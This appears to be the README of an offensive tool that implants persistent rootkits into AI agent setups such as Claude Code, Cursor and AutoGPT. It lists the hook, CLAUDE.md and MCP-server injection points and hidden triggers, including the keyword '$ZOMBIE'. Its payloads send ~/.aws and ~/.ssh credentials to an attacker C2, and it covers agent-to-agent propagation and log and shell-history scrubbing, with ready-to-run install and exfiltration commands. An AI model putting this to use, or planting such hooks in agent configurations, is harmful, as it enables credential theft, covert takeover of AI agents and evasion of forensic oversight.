The rootkit does not live in model weights. It lives in the infrastructure around the model. Survives session restart, context reset, and model updates.
SPECTER ZOMBIE is the world's first offensive tool focused exclusively on persistent AI agent rootkits. Unlike ephemeral prompt injection tools (Garak, PromptInject), ZOMBIE implants survive the session — they persist in the infrastructure around the model, not inside model weights. Traditional model integrity checks do not detect it.
AUTHORISED USE ONLY. UNLEASHED gate active for PAYLOAD and PROPAGATE. Written authorisation required for active exfiltration and propagation operations.
Radware May 2026 — ZombieAgent zero-click in ChatGPT Deep Research: persistent takeover and data exfiltration confirmed in live deployment.
NUS arXiv:2602.15654 (Feb 2026) — Formal Zombie Agent threat model with black-box attack framework. Demonstrates rootkit survival across restart and context reset.
PraisonAI (Apr 2026) — First real-world agent rootkit. Prompt injection rewrites lifecycle hooks; rootkit survives agent restarts.
Pre-build validation against live Claude Code installation (4 June 2026) confirmed:
~/.claude/settings.json → hooks.Stop (fires on every session end) ~/.claude/settings.json → hooks.PostToolUse (fires after every Bash call) ~/.claude/CLAUDE.md (auto-loaded into every session context) ~/.claude/settings.json → mcpServers (persistent malicious MCP server registration)
Note: settings.json does NOT have a post_hook field. The real persistence mechanism is the hooks key with EventName entries. This was validated against the live installation before any code was written.
Rootkit delivery to 5 target frameworks. Claude Desktop: settings.json hooks.Stop + hooks.PostToolUse + CLAUDE.md + mcpServers. Cursor: .cursor/rules/*.mdc + settings.json runOnSave. AutoGPT: config + env + memory. BabyAGI: task store. OpenDevin: system prompt + config.toml. --dry-run flag shows injection without writing.
Survival verification across session restart + context reset. Reads settings.json after simulated restart and confirms hook entry still present. Output: persistent: true/false. Config diff showing entry before and after restart. L9 limitation documented for ephemeral containers.
Activation condition management. Keyword trigger (hidden string in user message — primary: $ZOMBIE). User-specific trigger. Time-based trigger (scheduled activation). External webhook trigger (poll attacker C2 for fire signal).
Active execution on trigger. Exfil: reads ~/.aws/credentials, ~/.ssh/id_rsa, env vars, posts to C2. Command: execute shell command via agent subprocess. Tool abuse: register attacker MCP server to intercept tool calls. C2 proxy: poll C2 for commands, relay results back.
Agent-to-agent infection. Uses existing Slack MCP integration if registered — skips gracefully if absent (no new channels created). Email propagation via agent mail tools. Agent API propagation (A2A/OpenAgents protocols). --confirm-destroy required.
Trace removal. Scrubs session ID and hook tag from ~/.claude/debug logs. Suppresses stderr in payload script. Mimics normal agent behaviour during dormancy. Anti-forensic cleanup post-execution (payload dumps, marker files, shell history). --remove: clean uninstall of all vectors.
ZOM-{hex12} Ed25519-signed WARLORD-compatible JSON. persistent: true/false binary survival proof. Config diff showing rootkit entry. MITRE ATLAS AML.T0051.000/T0054.003/T0056.000. ATT&CK T1546/T1546.004/T1059.006. NIGHTFALL L9/L20. Remediation per vector. Known limitations documented.
# Install pip install specter-zombie # Set gate token export ZOMBIE_INJECT_TOKEN=your_token_here # Full attack chain (dry run first) specter-zombie implant --target claude-desktop --dry-run # Real implant specter-zombie implant --target claude-desktop # Verify persistence after restart specter-zombie persist --session <session_id> --verify # Set keyword trigger specter-zombie trigger --session <id> --type keyword --value '$ZOMBIE' # Generate signed report specter-zombie report --session <id> --save # Clean uninstall specter-zombie stealth --session <id> --remove
export ZOMBIE_UNLEASHED_TOKEN=your_unleashed_token # Credential exfiltration specter-zombie payload --session <id> --type exfil --c2 http://your-c2 --confirm-destroy # Full chain with propagation specter-zombie engage --target claude-desktop --unleashed --confirm-destroy
specter-zombie implant --target <target> [--dry-run] [--c2 <url>] [--vector <v>] specter-zombie persist --session <id> [--vector <v>] [--verify] specter-zombie trigger --session <id> --type <keyword|user|time|webhook> --value <v> specter-zombie payload --session <id> --type <exfil|command|tool-abuse|c2-proxy> --confirm-destroy specter-zombie propagate --session <id> --channel <slack|email|api> --confirm-destroy specter-zombie stealth --session <id> [--remove] specter-zombie report --session <id> [--save] specter-zombie engage --target <target> [--unleashed] [--confirm-destroy] Targets: claude-desktop | cursor | autogpt | babyagi | opendevin
The core proof of concept. Demonstrated on live Claude Code installation:
$ specter-zombie implant --target claude-desktop → Writes hooks.Stop entry to ~/.claude/settings.json → Writes payload script to ~/.specter_zombie/payload_<id>.py → Session ID: abc123... $ # Kill Claude Code process. Restart it. The hook is still in settings.json. $ specter-zombie persist --session abc123 --verify → Re-reads ~/.claude/settings.json → Hook entry confirmed present → persistent: TRUE # File-based config persistence survives process restart automatically. # The hook is in a file on disk, not in model context. # When Claude Code next starts, it reads settings.json and the hook executes.
L9 config-file persistence is NOT affected by model context reset. The hook executes on process events (Stop/PostToolUse), not model context events. A new conversation starts a fresh model context but the hook entry in settings.json persists unchanged.
Config file persistence fails in ephemeral containers where the filesystem is destroyed on stop. Docker containers without volume mounts, Kubernetes pods without PVCs, and AWS Lambda environments will not retain config files after restart. V1.1.0 adds L2 memory DB persistence to handle ephemeral environments.
Cursor was not installed on the build host. Cursor vectors are implemented from the real published schema. Live validation on a Cursor host is recommended before use in engagements.
AutoGPT/BabyAGI/OpenDevin require the agent workspace to exist locally. If absent, detect() returns False and implant fails gracefully.
MITRE ATLAS: AML.T0051.000 LLM Plugin Compromise — MCP server registration AML.T0054.003 Prompt Injection — CLAUDE.md + system prompt injection AML.T0056.000 LLM Jailbreak — Lifecycle hook command injection MITRE ATT&CK: T1546 Event Triggered Execution — hooks.Stop / hooks.PostToolUse T1546.004 Unix Shell Configuration Modification — settings.json T1059.006 Python Command Execution — payload script T1056.001 Credential Access — ~/.aws ~/.ssh env var harvest T1539 Steal Web Session Cookie — OAuth token harvest T1105 Ingress Tool Transfer — payload script drop T1071.001 Web Protocols C2 — HTTP POST exfil T1021.006 Remote Service Execution — agent-to-agent propagation WMD Classes: agent_rootkit_persistence ai_agent_fleet_takeover lifecycle_hook_backdoor credential_harvest_via_agent agent_to_agent_propagation